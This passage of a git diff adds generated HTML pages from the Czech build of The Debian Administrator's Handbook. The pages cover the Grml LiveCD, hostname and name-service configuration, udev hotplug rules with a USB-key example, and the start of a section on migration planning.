+          class="next"><a
+            accesskey="n"
+            href="sect.tails.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.grml"></a>A.6. Grml</h2></div></div></div><a
+          id="id-1.20.9.2"
+          class="indexterm"></a><div
+          class="para">
+			Grml is a LiveCD with many tools for system administrators, dealing with installation, deployment, and system rescue. The LiveCD is provided in two flavors, <code
+            class="literal">full</code> and <code
+            class="literal">small</code>, both available for 32-bit and 64-bit PCs. Obviously, the two flavors differ by the amount of software included and by the resulting size. <div
+            xmlns=""
+            class="url">→ <a
+              xmlns="http://www.w3.org/1999/xhtml"
+              href="https://grml.org">https://grml.org</a></div>
+		</div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.aptosid.html"><strong>Předcházející</strong>A.5. Aptosid and Siduction</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.tails.html"><strong>Další</strong>A.7. Tails</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.hostname-name-service.html b/tmp/cs-CZ/html/sect.hostname-name-service.html
new file mode 100644
index 000000000..44d17a14b
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.hostname-name-service.html
@@ -0,0 +1,232 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">8.3. Setting the Hostname and Configuring the Name Service</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Configuration, Localization, Locales, Network, Name resolution, Users, Groups, Accounts, Command-line interpreter, Shell, Printing, Bootloader, Kernel compiling" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="basic-configuration.html"
+        title="Kapitola 8. Basic Configuration: Network, Accounts, Printing..." /><link
+        rel="prev"
+        href="sect.network-config.html"
+        title="8.2. Configuring the Network" /><link
+        rel="next"
+        href="sect.user-group-databases.html"
+        title="8.4. User and Group Databases" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.hostname-name-service.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.network-config.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.user-group-databases.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.hostname-name-service"></a>8.3. Setting the Hostname and Configuring the Name Service</h2></div></div></div><a
+          id="id-1.11.7.2"
+          class="indexterm"></a><a
+          id="id-1.11.7.3"
+          class="indexterm"></a><div
+          class="para">
+			The purpose of assigning names to IP numbers is to make them easier for people to remember. In reality, an IP address identifies a network interface associated with a device such as a network card. Since each machine can have several network cards, and several interfaces on each card, one single computer can have several names in the domain name system.
+		</div><div
+          class="para">
+			Each machine is, however, identified by a main (or “canonical”) name, stored in the <code
+            class="filename">/etc/hostname</code> file and communicated to the Linux kernel by initialization scripts through the <code
+            class="command">hostname</code> command. The current value is available in a virtual filesystem, and you can get it with the <code
+            class="command">cat /proc/sys/kernel/hostname</code> command.
+		</div><a
+          id="id-1.11.7.6"
+          class="indexterm"></a><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>BACK TO BASICS</em></span> <code
+                      class="filename">/proc/</code> and <code
+                      class="filename">/sys/</code>, virtual filesystems</strong></p></div></div></div><a
+            id="id-1.11.7.7.2"
+            class="indexterm"></a><a
+            id="id-1.11.7.7.3"
+            class="indexterm"></a><a
+            id="id-1.11.7.7.4"
+            class="indexterm"></a><a
+            id="id-1.11.7.7.5"
+            class="indexterm"></a><div
+            class="para">
+			The <code
+              class="filename">/proc/</code> and <code
+              class="filename">/sys/</code> file trees are generated by “virtual” filesystems. This is a practical means of recovering information from the kernel (by listing virtual files) and communicating them to it (by writing to virtual files).
+		</div><div
+            class="para">
+			<code
+              class="filename">/sys/</code> in particular is designed to provide access to internal kernel objects, especially those representing the various devices in the system. The kernel can, thus, share various pieces of information: the status of each device (for example, if it is in energy saving mode), whether it is a removable device, etc. Note that <code
+              class="filename">/sys/</code> has only existed since kernel version 2.6.
+		</div></div><div
+          class="para">
+			Surprisingly, the domain name is not managed in the same way, but comes from the complete name of the machine, acquired through name resolution. You can change it in the <code
+            class="filename">/etc/hosts</code> file; simply write a complete name for the machine there at the beginning of the list of names associated with the address of the machine, as in the following example:
+		</div><div
+          class="informalexample"><pre
+            class="programlisting">
+127.0.0.1     localhost
+192.168.0.1   arrakis.falcot.com arrakis
+</pre></div><a
+          id="id-1.11.7.10"
+          class="indexterm"></a><a
+          id="id-1.11.7.11"
+          class="indexterm"></a><a
+          id="id-1.11.7.12"
+          class="indexterm"></a><a
+          id="id-1.11.7.13"
+          class="indexterm"></a><a
+          id="id-1.11.7.14"
+          class="indexterm"></a><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.name-resolution"></a>8.3.1. Name Resolution</h3></div></div></div><a
+            id="id-1.11.7.15.2"
+            class="indexterm"></a><a
+            id="id-1.11.7.15.3"
+            class="indexterm"></a><div
+            class="para">
+				The mechanism for name resolution in Linux is modular and can use various sources of information declared in the <code
+              class="filename">/etc/nsswitch.conf</code> file. The entry that involves host name resolution is <code
+              class="literal">hosts</code>. By default, it contains <code
+              class="literal">files dns</code>, which means that the system consults the <code
+              class="filename">/etc/hosts</code> file first, then DNS servers. NIS/NIS+ or LDAP servers are other possible sources.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>NOTE</em></span> NSS and DNS</strong></p></div></div></div><div
+              class="para">
+				Be aware that the commands specifically intended to query DNS (especially <code
+                class="command">host</code>) do not use the standard name resolution mechanism (NSS). As a consequence, they do not take into consideration <code
+                class="filename">/etc/nsswitch.conf</code>, and thus, not <code
+                class="filename">/etc/hosts</code> either.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.dns-server-configuration"></a>8.3.1.1. Configuring DNS Servers</h4></div></div></div><a
+              id="id-1.11.7.15.6.2"
+              class="indexterm"></a><a
+              id="id-1.11.7.15.6.3"
+              class="indexterm"></a><div
+              class="para">
+					DNS (Domain Name Service) is a distributed and hierarchical service mapping names to IP addresses, and vice-versa. Specifically, it can turn a human-friendly name such as <code
+                class="literal">www.eyrolles.com</code> into the actual IP address, <code
+                class="literal">213.244.11.247</code>.
+				</div><div
+              class="para">
+					To access DNS information, a DNS server must be available to relay requests. Falcot Corp has its own, but an individual user is more likely to use the DNS servers provided by their ISP.
+				</div><a
+              id="id-1.11.7.15.6.6"
+              class="indexterm"></a><a
+              id="id-1.11.7.15.6.7"
+              class="indexterm"></a><div
+              class="para">
+					The DNS servers to be used are indicated in the <code
+                class="filename">/etc/resolv.conf</code>, one per line, with the <code
+                class="literal">nameserver</code> keyword preceding an IP address, as in the following example:
+				</div><pre
+              class="programlisting">
+nameserver 212.27.32.176
+nameserver 212.27.32.177
+nameserver 8.8.8.8
+</pre><div
+              class="para">
+					Note that the <code
+                class="filename">/etc/resolv.conf</code> file may be handled automatically (and overwritten) when the network is managed by NetworkManager or configured via DHCP.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.etc-hosts"></a>8.3.1.2. The <code
+                      class="filename">/etc/hosts</code> file</h4></div></div></div><a
+              id="id-1.11.7.15.7.2"
+              class="indexterm"></a><a
+              id="id-1.11.7.15.7.3"
+              class="indexterm"></a><div
+              class="para">
+					If there is no name server on the local network, it is still possible to establish a small table mapping IP addresses and machine hostnames in the <code
+                class="filename">/etc/hosts</code> file, usually reserved for local network stations. The syntax of this file is very simple: each line indicates a specific IP address followed by the list of any associated names (the first being “completely qualified”, meaning it includes the domain name).
+				</div><div
+              class="para">
+					This file is available even during network outages or when DNS servers are unreachable, but will only really be useful when duplicated on all the machines on the network. The slightest alteration in correspondence will require the file to be updated everywhere. This is why <code
+                class="filename">/etc/hosts</code> generally only contains the most important entries.
+				</div><div
+              class="para">
+					This file will be sufficient for a small network not connected to the Internet, but with 5 machines or more, it is recommended to install a proper DNS server.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TIP</em></span> Bypassing DNS</strong></p></div></div></div><div
+                class="para">
+					Since applications check the <code
+                  class="filename">/etc/hosts</code> file before querying DNS, it is possible to include information in there that is different from what the DNS would return, and therefore to bypass normal DNS-based name resolution.
+				</div><div
+                class="para">
+					This allows, in the event of DNS changes not yet propagated, to test access to a website with the intended name even if this name is not properly mapped to the correct IP address yet.
+				</div><div
+                class="para">
+					Another possible use is to redirect traffic intended for a specific host to the localhost, thus preventing any communication with the given host. For example, hostnames of servers dedicated to serving ads could be diverted which would bypass these ads resulting in more fluid, less distracting, navigation.
+				</div></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.network-config.html"><strong>Předcházející</strong>8.2. Configuring the Network</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.user-group-databases.html"><strong>Další</strong>8.4. User and Group Databases</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.hotplug.html b/tmp/cs-CZ/html/sect.hotplug.html
new file mode 100644
index 000000000..6908ab59c
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.hotplug.html
@@ -0,0 +1,394 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">9.11. Hot Plugging: hotplug</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="System boot, Initscripts, SSH, Telnet, Rights, Permissions, Supervision, Inetd, Cron, Backup, Hotplug, PCMCIA, APM, ACPI" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="unix-services.html"
+        title="Kapitola 9. Unix Services" /><link
+        rel="prev"
+        href="sect.backup.html"
+        title="9.10. Backup" /><link
+        rel="next"
+        href="sect.power-management.html"
+        title="9.12. Power Management: Advanced Configuration and Power Interface (ACPI)" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.hotplug.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.backup.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.power-management.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.hotplug"></a>9.11. Hot Plugging: <span
+                  class="emphasis"><em>hotplug</em></span></h2></div></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.14.2"></a>9.11.1. Introduction</h3></div></div></div><div
+            class="para">
+				The <span
+              class="emphasis"><em>hotplug</em></span> kernel subsystem dynamically handles the addition and removal of devices, by loading the appropriate drivers and by creating the corresponding device files (with the help of <code
+              class="command">udevd</code>). With modern hardware and virtualization, almost everything can be hotplugged: from the usual USB/PCMCIA/IEEE 1394 peripherals to SATA hard drives, but also the CPU and the memory.
+			</div><div
+            class="para">
+				The kernel has a database that associates each device ID with the required driver. This database is used during boot to load all the drivers for the peripheral devices detected on the different buses, but also when an additional hotplug device is connected. Once the device is ready for use, a message is sent to <code
+              class="command">udevd</code> so it will be able to create the corresponding entry in <code
+              class="filename">/dev/</code>.
+			</div><a
+            id="id-1.12.14.2.4"
+            class="indexterm"></a><a
+            id="id-1.12.14.2.5"
+            class="indexterm"></a><a
+            id="id-1.12.14.2.6"
+            class="indexterm"></a><a
+            id="id-1.12.14.2.7"
+            class="indexterm"></a><a
+            id="id-1.12.14.2.8"
+            class="indexterm"></a><a
+            id="id-1.12.14.2.9"
+            class="indexterm"></a></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.14.3"></a>9.11.2. The Naming Problem</h3></div></div></div><div
+            class="para">
+				Before the appearance of hotplug connections, it was easy to assign a fixed name to a device. It was based simply on the position of the devices on their respective bus. But this is not possible when such devices can come and go on the bus. The typical case is the use of a digital camera and a USB key, both of which appear to the computer as disk drives. The first one connected may be <code
+              class="filename">/dev/sdb</code> and the second <code
+              class="filename">/dev/sdc</code> (with <code
+              class="filename">/dev/sda</code> representing the computer's own hard drive). The device name is not fixed; it depends on the order in which devices are connected.
+			</div><div
+            class="para">
+				Additionally, more and more drivers use dynamic values for devices' major/minor numbers, which makes it impossible to have static entries for the given devices, since these essential characteristics may vary after a reboot.
+			</div><div
+            class="para">
+				<span
+              class="emphasis"><em>udev</em></span> was created precisely to solve this problem.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.14.4"></a>9.11.3. How <span
+                    class="emphasis"><em>udev</em></span> Works</h3></div></div></div><div
+            class="para">
+				When <span
+              class="emphasis"><em>udev</em></span> is notified by the kernel of the appearance of a new device, it collects various information on the given device by consulting the corresponding entries in <code
+              class="filename">/sys/</code>, especially those that uniquely identify it (MAC address for a network card, serial number for some USB devices, etc.).
+			</div><div
+            class="para">
+				Armed with all of this information, <span
+              class="emphasis"><em>udev</em></span> then consults all of the rules contained in <code
+              class="filename">/etc/udev/rules.d/</code> and <code
+              class="filename">/lib/udev/rules.d/</code>. In this process it decides how to name the device, what symbolic links to create (to give it alternative names), and what commands to execute. All of these files are consulted, and the rules are all evaluated sequentially (except when a file uses “GOTO” directives). Thus, there may be several rules that correspond to a given event.
+			</div><div
+            class="para">
+				The syntax of rules files is quite simple: each row contains selection criteria and variable assignments. The former are used to select events for which there is a need to react, and the latter defines the action to take. They are all simply separated with commas, and the operator implicitly differentiates between a selection criterion (with comparison operators, such as <code
+              class="literal">==</code> or <code
+              class="literal">!=</code>) or an assignment directive (with operators such as <code
+              class="literal">=</code>, <code
+              class="literal">+=</code> or <code
+              class="literal">:=</code>).
+			</div><div
+            class="para">
+				Comparison operators are used on the following variables:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">KERNEL</code>: the name that the kernel assigns to the device;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ACTION</code>: the action corresponding to the event (“add” when a device has been added, “remove” when it has been removed);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">DEVPATH</code>: the path of the device's <code
+                    class="filename">/sys/</code> entry;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">SUBSYSTEM</code>: the kernel subsystem which generated the request (there are many, but a few examples are “usb”, “ide”, “net”, “firmware”, etc.);
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">ATTR{<em
+                      class="replaceable">attribute</em>}</code>: file contents of the <em
+                    class="replaceable">attribute</em> file in the <code
+                    class="filename">/sys/<em
+                      class="replaceable">$devpath</em>/</code> directory of the device. This is where you find the MAC address and other bus specific identifiers;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">KERNELS</code>, <code
+                    class="literal">SUBSYSTEMS</code> and <code
+                    class="literal">ATTRS{<em
+                      class="replaceable">attributes</em>}</code> are variations that will try to match the different options on one of the parent devices of the current device;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">PROGRAM</code>: delegates the test to the indicated program (true if it returns 0, false if not). The content of the program's standard output is stored so that it can be reused by the <code
+                    class="literal">RESULT</code> test;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">RESULT</code>: execute tests on the standard output stored during the last call to <code
+                    class="literal">PROGRAM</code>.
+					</div></li></ul></div><div
+            class="para">
+				The right operands can use pattern expressions to match several values at the same time. For instance, <code
+              class="literal">*</code> matches any string (even an empty one); <code
+              class="literal">?</code> matches any character, and <code
+              class="literal">[]</code> matches the set of characters listed between the square brackets (or the opposite thereof if the first character is an exclamation point, and contiguous ranges of characters are indicated like <code
+              class="literal">a-z</code>).
+			</div><div
+            class="para">
+				Regarding the assignment operators, <code
+              class="literal">=</code> assigns a value (and replaces the current value); in the case of a list, it is emptied and contains only the value assigned. <code
+              class="literal">:=</code> does the same, but prevents later changes to the same variable. As for <code
+              class="literal">+=</code>, it adds an item to a list. The following variables can be changed:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">NAME</code>: the device filename to be created in <code
+                    class="filename">/dev/</code>. Only the first assignment counts; the others are ignored;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">SYMLINK</code>: the list of symbolic links that will point to the same device;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">OWNER</code>, <code
+                    class="literal">GROUP</code> and <code
+                    class="literal">MODE</code> define the user and group that owns the device, as well as the associated permission;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">RUN</code>: the list of programs to execute in response to this event.
+					</div></li></ul></div><div
+            class="para">
+				The values assigned to these variables may use a number of substitutions:
+			</div><div
+            xmlns:d="http://docbook.org/ns/docbook"
+            class="itemizedlist"><ul><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$kernel</code> or <code
+                    class="literal">%k</code>: equivalent to <code
+                    class="literal">KERNEL</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$number</code> or <code
+                    class="literal">%n</code>: the order number of the device, for example, for <code
+                    class="literal">sda3</code>, it would be “3”;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$devpath</code> or <code
+                    class="literal">%p</code>: equivalent to <code
+                    class="literal">DEVPATH</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$attr{<em
+                      class="replaceable">attribute</em>}</code> or <code
+                    class="literal">%s{<em
+                      class="replaceable">attribute</em>}</code>: equivalent to <code
+                    class="literal">ATTRS{<em
+                      class="replaceable">attribute</em>}</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$major</code> or <code
+                    class="literal">%M</code>: the kernel major number of the device;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$minor</code> or <code
+                    class="literal">%m</code>: the kernel minor number of the device;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						<code
+                    class="literal">$result</code> or <code
+                    class="literal">%c</code>: the string output by the last program invoked by <code
+                    class="literal">PROGRAM</code>;
+					</div></li><li
+                class="listitem"><div
+                  class="para">
+						and, finally, <code
+                    class="literal">%%</code> and <code
+                    class="literal">$$</code> for the percent and dollar sign, respectively.
+					</div></li></ul></div><div
+            class="para">
+				The above lists are not complete (they include only the most important parameters), but the <span
+              class="citerefentry"><span
+                class="refentrytitle">udev</span>(7)</span> manual page should be exhaustive.
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.12.14.5"></a>9.11.4. A concrete example</h3></div></div></div><div
+            class="para">
+				Let us consider the case of a simple USB key and try to assign it a fixed name. First, you must find the elements that will identify it in a unique manner. For this, plug it in and run <code
+              class="command">udevadm info -a -n /dev/sdc</code> (replacing <em
+              class="replaceable">/dev/sdc</em> with the actual name assigned to the key).
+			</div><pre
+            class="screen"><code
+              class="computeroutput"># </code><strong
+              class="userinput"><code>udevadm info -a -n /dev/sdc</code></strong>
+<code
+              class="computeroutput">[...]
+  looking at device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2/1-2.2:1.0/host9/target9:0:0/9:0:0:0/block/sdc':
+    KERNEL=="sdc"
+    SUBSYSTEM=="block"
+    DRIVER==""
+    ATTR{range}=="16"
+    ATTR{ext_range}=="256"
+    ATTR{removable}=="1"
+    ATTR{ro}=="0"
+    ATTR{size}=="126976"
+    ATTR{alignment_offset}=="0"
+    ATTR{capability}=="53"
+    ATTR{stat}=="      51      100     1208      256        0        0        0        0        0      192      25        6"
+    ATTR{inflight}=="       0        0"
+[...]
+  looking at parent device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2/1-2.2:1.0/host9/target9:0:0/9:0:0:0':
+    KERNELS=="9:0:0:0"
+    SUBSYSTEMS=="scsi"
+    DRIVERS=="sd"
+    ATTRS{device_blocked}=="0"
+    ATTRS{type}=="0"
+    ATTRS{scsi_level}=="3"
+    ATTRS{vendor}=="I0MEGA  "
+    ATTRS{model}=="UMni64MB*IOM2C4 "
+    ATTRS{rev}=="    "
+    ATTRS{state}=="running"
+[...]
+    ATTRS{max_sectors}=="240"
+[...]
+  looking at parent device '/devices/pci0000:00/0000:00:10.3/usb1/1-2/1-2.2':
+    KERNELS=="9:0:0:0"
+    SUBSYSTEMS=="usb"
+    DRIVERS=="usb"
+    ATTRS{configuration}=="iCfg"
+    ATTRS{bNumInterfaces}==" 1"
+    ATTRS{bConfigurationValue}=="1"
+    ATTRS{bmAttributes}=="80"
+    ATTRS{bMaxPower}=="100mA"
+    ATTRS{urbnum}=="398"
+    ATTRS{idVendor}=="4146"
+    ATTRS{idProduct}=="4146"
+    ATTRS{bcdDevice}=="0100"
+[...]
+    ATTRS{manufacturer}=="USB Disk"
+    ATTRS{product}=="USB Mass Storage Device"
+    ATTRS{serial}=="M004021000001"
+[...]
+</code></pre><div
+            class="para">
+				To create a new rule, you can use tests on the device's variables, as well as those of one of the parent devices. The above case allows us to create two rules like these:
+			</div><pre
+            class="programlisting">KERNEL=="sd?", SUBSYSTEM=="block", ATTRS{serial}=="M004021000001", SYMLINK+="usb_key/disk"
+KERNEL=="sd?[0-9]", SUBSYSTEM=="block", ATTRS{serial}=="M004021000001", SYMLINK+="usb_key/part%n"
+</pre><div
+            class="para">
+				Once these rules are set in a file, named for example <code
+              class="filename">/etc/udev/rules.d/010_local.rules</code>, you can simply remove and reconnect the USB key. You can then see that <code
+              class="filename">/dev/usb_key/disk</code> represents the disk associated with the USB key, and <code
+              class="filename">/dev/usb_key/part1</code> is its first partition.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> Debugging <span
+                        class="emphasis"><em>udev</em></span>'s configuration</strong></p></div></div></div><div
+              class="para">
+				Like many daemons, <code
+                class="command">udevd</code> stores logs in <code
+                class="filename">/var/log/daemon.log</code>. But it is not very verbose by default, and it is usually not enough to understand what is happening. The <code
+                class="command">udevadm control --log-priority=info</code> command increases the verbosity level and solves this problem. <code
+                class="command">udevadm control --log-priority=err</code> returns to the default verbosity level.
+			</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.backup.html"><strong>Předcházející</strong>9.10. Backup</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.power-management.html"><strong>Další</strong>9.12. Power Management: Advanced Configuration an...</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/sect.how-to-migrate.html b/tmp/cs-CZ/html/sect.how-to-migrate.html
new file mode 100644
index 000000000..be05205b1
--- /dev/null
+++ b/tmp/cs-CZ/html/sect.how-to-migrate.html
@@ -0,0 +1,303 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">3.2. How To Migrate</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Existing Setup, Reuse, Migration" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="existing-setup.html"
+        title="Kapitola 3. Analyzing the Existing Setup and Migrating" /><link
+        rel="prev"
+        href="existing-setup.html"
+        title="Kapitola 3. Analyzing the Existing Setup and Migrating" /><link
+        rel="next"
+        href="installation.html"
+        title="Kapitola 4. Installation" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.how-to-migrate.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="existing-setup.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="installation.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.how-to-migrate"></a>3.2. How To Migrate</h2></div></div></div><a
+          id="id-1.6.5.2"
+          class="indexterm"></a><div
+          class="para">
+			In order to guarantee continuity of the services, each computer migration must be planned and executed according to the plan. This principle applies whatever the operating system used.
+		</div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="id-1.6.5.4"></a>3.2.1. Survey and Identify Services</h3></div></div></div><div
+            class="para">
+				As simple as it seems, this step is essential. A serious administrator truly knows the principal roles of each server, but such roles can change, and sometimes experienced users may have installed “wild” services. Knowing that they exist will at least allow you to decide what to do with them, rather than delete them haphazardly.
+			</div><div
+            class="para">
+				For this purpose, it is wise to inform your users of the project before migrating the server. To involve them in the project, it may be useful to install the most common free software programs on their desktops prior to migration, which they will come across again after the migration to Debian; Libre Office and the Mozilla suite are the best examples here.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.6.5.4.4"></a>3.2.1.1. Network and Processes</h4></div></div></div><a
